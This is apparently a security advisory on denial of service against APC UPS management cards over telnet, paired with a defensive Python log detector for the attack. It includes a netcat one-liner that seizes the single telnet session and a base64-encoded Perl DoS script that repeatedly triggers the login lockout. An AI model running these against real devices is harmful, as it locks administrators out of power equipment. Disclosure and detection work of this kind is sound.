COMMAND

    APC

SYSTEMS AFFECTED

    APC web/snmp/telnet management

PROBLEM

    'altomo' found the following.  Some APC products, such as the
    Symmetra, offer the option of adding a management card to allow an
    admin to set up monitoring and notification.  The card is accessible
    by SNMP, web interface, and telnet.  It seems that only one telnet
    connection is allowed at a time (problem 1).  The telnet session is
    authenticated by a user/password method; if the incorrect combination
    is entered 3 times, no connections are allowed for the defined
    lockout time.  Min. 1 minute, max 10 minutes.  (problem 2)

    Problem 1
    =========
    Since only one connection is allowed to the telnet port, an admin
    could be kept from connecting.  Easy to reproduce.

        cat /dev/zero | nc ip-here 23  (ya ya dirty)

    Problem 2
    =========
    Lockout period.  Lockout periods are a good thing, we really do
    like them.  But when no one can connect it's a bad thing.  Since
    the lockout period cannot be set to 0, an attacker could take
    advantage of this by sending 3 incorrect login attempts to the
    unit and repeating every 60 secs, the minimal lockout time.  Even
    if the admin has the lockout set to 10 minutes, the attacker's
    attempts keep repeating and land as soon as logins are actually
    enabled again.
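    Both problems leave a trace in whatever log collects the card's
    telnet events.  The following Python script is an added example,
    not part of the original advisory or of any APC software: it parses
    a constructed, hypothetical log format (the card's real log format
    is not given here, so parse_line() is the part to adapt) and flags
    a source that trips the 3-strike lockout on a cadence matching the
    minimum lockout interval (problem 2) and a source that holds the
    single telnet session open (problem 1).  Hosts, users, timestamps
    and thresholds are all assumed sample values.

```python
#!/usr/bin/env python3
"""Flag the two telnet abuse patterns described above in card logs.

The log format below is constructed for this example; the real card's
log format is not documented on this page, so adapt parse_line() to it.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log, not real card output.  An admin logs in with one
# typo (harmless), 10.0.5.7 trips the 3-strike lockout three times about
# 60 s apart, then 10.0.5.9 opens a telnet session and never lets it go.
SAMPLE_LOG = """\
2001-02-26T17:29:10 ups1 telnet: session opened from=10.0.1.2
2001-02-26T17:29:10 ups1 telnet: login failed user=apc from=10.0.1.2
2001-02-26T17:29:25 ups1 telnet: login ok user=apc from=10.0.1.2
2001-02-26T17:29:50 ups1 telnet: session closed from=10.0.1.2
2001-02-26T17:30:02 ups1 telnet: session opened from=10.0.5.7
2001-02-26T17:30:02 ups1 telnet: login failed user=admin from=10.0.5.7
2001-02-26T17:30:03 ups1 telnet: login failed user=admin from=10.0.5.7
2001-02-26T17:30:04 ups1 telnet: login failed user=admin from=10.0.5.7
2001-02-26T17:30:04 ups1 telnet: session closed from=10.0.5.7
2001-02-26T17:31:08 ups1 telnet: session opened from=10.0.5.7
2001-02-26T17:31:08 ups1 telnet: login failed user=admin from=10.0.5.7
2001-02-26T17:31:09 ups1 telnet: login failed user=admin from=10.0.5.7
2001-02-26T17:31:10 ups1 telnet: login failed user=admin from=10.0.5.7
2001-02-26T17:31:10 ups1 telnet: session closed from=10.0.5.7
2001-02-26T17:32:14 ups1 telnet: session opened from=10.0.5.7
2001-02-26T17:32:14 ups1 telnet: login failed user=admin from=10.0.5.7
2001-02-26T17:32:15 ups1 telnet: login failed user=admin from=10.0.5.7
2001-02-26T17:32:16 ups1 telnet: login failed user=admin from=10.0.5.7
2001-02-26T17:32:16 ups1 telnet: session closed from=10.0.5.7
2001-02-26T17:36:00 ups1 telnet: session opened from=10.0.5.9
2001-02-26T17:50:00 ups1 system: heartbeat
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<svc>\w+): (?P<msg>.*)$")
OPEN_RE = re.compile(r"session opened from=(?P<src>[\d.]+)")
CLOSE_RE = re.compile(r"session closed from=(?P<src>[\d.]+)")
FAIL_RE = re.compile(r"login failed user=(?P<user>\S+) from=(?P<src>[\d.]+)")


def parse_line(line):
    """Turn one log line into an event dict, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.fromisoformat(m["ts"])
    for kind, rx in (("open", OPEN_RE), ("close", CLOSE_RE), ("fail", FAIL_RE)):
        mm = rx.match(m["msg"])
        if mm:
            return {"ts": ts, "kind": kind, **mm.groupdict()}
    return {"ts": ts, "kind": "other"}  # kept only as a time reference


def parse_log(text):
    return [e for e in (parse_line(l) for l in text.splitlines()) if e]


def lockout_hammering(events, threshold=3, burst_gap=10, interval=60,
                      tolerance=20, min_rounds=3):
    """Return {src: rounds} for sources that trip the lockout on a cadence.

    A burst is a run of failures no more than burst_gap seconds apart; a
    burst of at least `threshold` failures trips the lockout.  A source is
    flagged when at least min_rounds bursts recur roughly `interval`
    seconds apart (the page's minimum lockout is 1 minute).
    """
    fails = defaultdict(list)
    for e in events:
        if e["kind"] == "fail":
            fails[e["src"]].append(e["ts"])
    flagged = {}
    for src, times in fails.items():
        times.sort()
        bursts = []  # (first_ts, last_ts, count)
        for t in times:
            if bursts and (t - bursts[-1][1]).total_seconds() <= burst_gap:
                start, _, n = bursts[-1]
                bursts[-1] = (start, t, n + 1)
            else:
                bursts.append((t, t, 1))
        trips = [b[0] for b in bursts if b[2] >= threshold]
        if len(trips) < min_rounds:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(trips, trips[1:])]
        if all(abs(g - interval) <= tolerance for g in gaps):
            flagged[src] = len(trips)
    return flagged


def held_sessions(events, max_hold=600):
    """Return {src: seconds} for telnet sessions held longer than max_hold.

    A session that never closes is measured up to the last timestamp seen
    in the log, so a still-open session shows up on every run.
    """
    horizon = max(e["ts"] for e in events)
    open_at, held = {}, {}
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["kind"] == "open":
            open_at[e["src"]] = e["ts"]
        elif e["kind"] == "close" and e["src"] in open_at:
            dur = (e["ts"] - open_at.pop(e["src"])).total_seconds()
            if dur > max_hold:
                held[e["src"]] = dur
    for src, t in open_at.items():
        dur = (horizon - t).total_seconds()
        if dur > max_hold:
            held[src] = dur
    return held


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("lockout hammering:", lockout_hammering(evs))
    print("held sessions:    ", held_sessions(evs))
```

    The cadence check is what separates an attacker from an admin with a
    sticky Caps Lock: one burst of three failures is noise, three bursts
    spaced by the lockout interval is someone keeping the door shut.
    The held-session check is deliberately simple because the card gives
    no other signal; a single long-lived telnet session with no login is
    the whole symptom of problem 1.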

    Both of these are easy to reproduce.

    DoS Code:

    ---
    Content-Type: application/octet-stream; name="apcdos.pl"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="apcdos.pl"
    Content-MD5: F3KB1oBnhiW8zWzz9gvdVQ==
    
    IyEvdXNyL2Jpbi9wZXJsCiNhbHRvbW9AbnVkZWhhY2tlcnMuY29tCiNhcGMgbWFuYWdlbWVu
    dCBjYXJkIGRvcwoKJHVzZXIgPSAiYmxhY2tzdW4iOwokdGltZSA9ICIkQVJHVlsxXSI7Cgp1
    c2UgSU86OlNvY2tldDsKJGlwID0gIiRBUkdWWzBdIjsKJHBvcnQgPSAiMjMiOwppZiAoJCNB
    UkdWPDApIHsKcHJpbnQgIiB1c2VhZ2U6ICQwIDxob3N0bmFtZT4gPGRlbGF5IGluIHNlY29u
    ZHM+XG4iOwpleGl0KCk7Cn0KJHNvY2tldCA9IElPOjpTb2NrZXQ6OklORVQtPm5ldygKUHJv
    dG89PiJ0Y3AiLApQZWVyQWRkcj0+JGlwLApQZWVyUG9ydD0+JHBvcnQsKTsKCgpwcmludCAi
    QXBjIG1hbmFnZW1lbnQgY2FyZCBEb1NcbiI7CnByaW50ICJhbHRvbW9cQG51ZGVoYWNrZXJz
    LmNvbVxuIjsKCgpzdWIgZG9zKCkgewpwcmludCAiRG9TIHN0YXJ0ZWQgd2lsbCBhdHRhY2sg
    ZXZlcnkgJHRpbWUgc2Vjb25kc1xuIjsKcHJpbnQgIkN0cmwrQyB0byBleGl0XG4iOwpwcmlu
    dCAkc29ja2V0ICIkdXNlclxyIjsKcHJpbnQgJHNvY2tldCAiJHVzZXJcciI7CnByaW50ICRz
    b2NrZXQgIiR1c2VyXHIiOwpwcmludCAkc29ja2V0ICIkdXNlclxyIjsKcHJpbnQgJHNvY2tl
    dCAiJHVzZXJcciI7CnByaW50ICRzb2NrZXQgIiR1c2VyXHIiOwpwcmludCAiXG4iOwpjbG9z
    ZSAkc29ja2V0OwpzbGVlcCgkdGltZSk7ICAgICAgICAgIAomZG9zOwoKfQomZG9zOwojaG9u
    ZyBrb25nIGRhbmdlciBkdW8K
    
    -----

SOLUTION

    The author contacted APC via email, informed them of what had been
    found, and asked if this was going to be addressed in the future.
    The response received back was:

        "At this time the security on  the web card is at its  highest
         level.  The only other  suggestion is to make changes  on the
         firewall."

    APC's response is kinda true.  Why would you want to have the
    telnet port of your UPS wide open to the world?  These UPS IPs
    should sit behind your DMZ and be treated as internal servers.  Or
    at least they should be on a private subnet, and admins should have
    to log on to a box and hop over to the UPS private subnet.

    BUT what about internal attackers?  There are 2 ghetto style
    workarounds, of course.

        1. leave web or SNMP open to manage this product
        2. put it on a private network with a Linux box in front; ssh
           to the Linux box, then telnet to the APC.